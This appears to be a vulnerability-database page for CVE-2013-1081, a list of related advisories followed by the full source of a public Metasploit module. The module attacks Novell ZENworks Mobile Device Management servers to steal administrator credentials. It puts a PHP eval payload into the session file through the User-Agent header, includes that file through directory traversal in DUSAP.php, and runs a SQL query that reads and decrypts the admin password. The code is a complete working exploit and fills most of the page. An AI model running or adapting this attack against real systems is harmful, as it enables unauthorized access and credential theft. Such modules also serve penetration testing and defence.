| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Novell Zenworks Mobile Device Management Local File Inclusion | 7 Jun 201300:00 | – | zdt | |
| CVE-2013-1081 | 7 Jun 201300:00 | – | circl | |
| Novell ZENworks Mobile Management MDM.php Code Execution (CVE-2013-1081) | 25 Aug 201300:00 | – | checkpoint_advisories | |
| CVE-2013-1081 | 11 Mar 201321:00 | – | cve | |
| CVE-2013-1081 | 11 Mar 201321:00 | – | cvelist | |
| Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit) | 7 Jun 201300:00 | – | exploitdb | |
| Novell Zenworks Mobile Device Management Admin Credentials | 4 Jun 201316:20 | – | metasploit | |
| Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability | 4 Jun 201316:20 | – | metasploit | |
| Novell ZENworks Mobile Management MDM.php Local File Inclusion | 14 Mar 201300:00 | – | nessus | |
| CVE-2013-1081 | 11 Mar 201321:55 | – | nvd |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Novell Zenworks Mobile Device Management Admin Credentials',
'Description' => %q{
This module attempts to pull the administrator credentials from
a vulnerable Novell Zenworks MDM server.
},
'Author' =>
[
'steponequit',
'Andrea Micalizzi (aka rgod)' #zdireport
],
'References' =>
[
['CVE', '2013-1081'],
['OSVDB', '91119'],
['URL', 'https://support.microfocus.com/kb/doc.php?id=7011895']
],
'License' => MSF_LICENSE
)
register_options([
OptString.new('TARGETURI', [true, 'Path to the Novell Zenworks MDM install', '/'])
])
register_advanced_options([
OptBool.new('SSL', [true, "Negotiate SSL connection", false])
])
end
def setup_session()
sess = Rex::Text.rand_text_alpha(8)
cmd = Rex::Text.rand_text_alpha(8)
res = send_request_cgi({
'agent' => "<?php echo(eval($_GET['#{cmd}'])); ?>",
'method' => "HEAD",
'uri' => normalize_uri("#{target_uri.path}", "download.php"),
'headers' => {"Cookie" => "PHPSESSID=#{sess}"},
})
return sess,cmd
end
def get_creds(session_id,cmd_var)
cmd = '$pass=mdm_ExecuteSQLQuery('
cmd << '"SELECT UserName,Password FROM Administrators where AdministratorSAKey = 1"'
cmd << ',array(),false,-1,"","","",QUERY_TYPE_SELECT);'
cmd << 'echo "".$pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"])."";'
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{target_uri.path}", "DUSAP.php"),
'vars_get' => {
'language' => "res/languages/../../../../php/temp/sess_#{session_id}",
cmd_var => cmd
}
})
if res.nil?
print_error("Connection timed out")
return "", "" # Empty username & password
end
creds = res.body.to_s.match(/.*:"(.*)";.*";/)[1]
return creds.split(":")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'novellmdm',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def run_host(ip)
print_status("Verifying that Zenworks login page exists at #{ip}")
uri = normalize_uri(target_uri.path)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => uri
})
if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
print_status("Found Zenworks MDM, Checking application version")
ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
print_status("Found Version #{ver}")
session_id,cmd = setup_session()
user,pass = get_creds(session_id,cmd)
return if user.empty? and pass.empty?
print_good("Got creds. Login:#{user} Password:#{pass}")
print_good("Access the admin interface here: #{ip}:#{rport}#{target_uri.path}dashboard/")
report_cred(ip: ip, port: rport, user: user, password: pass, proof: res.body)
else
print_error("Zenworks MDM does not appear to be running at #{ip}")
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
rescue ::OpenSSL::SSL::SSLError => e
return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation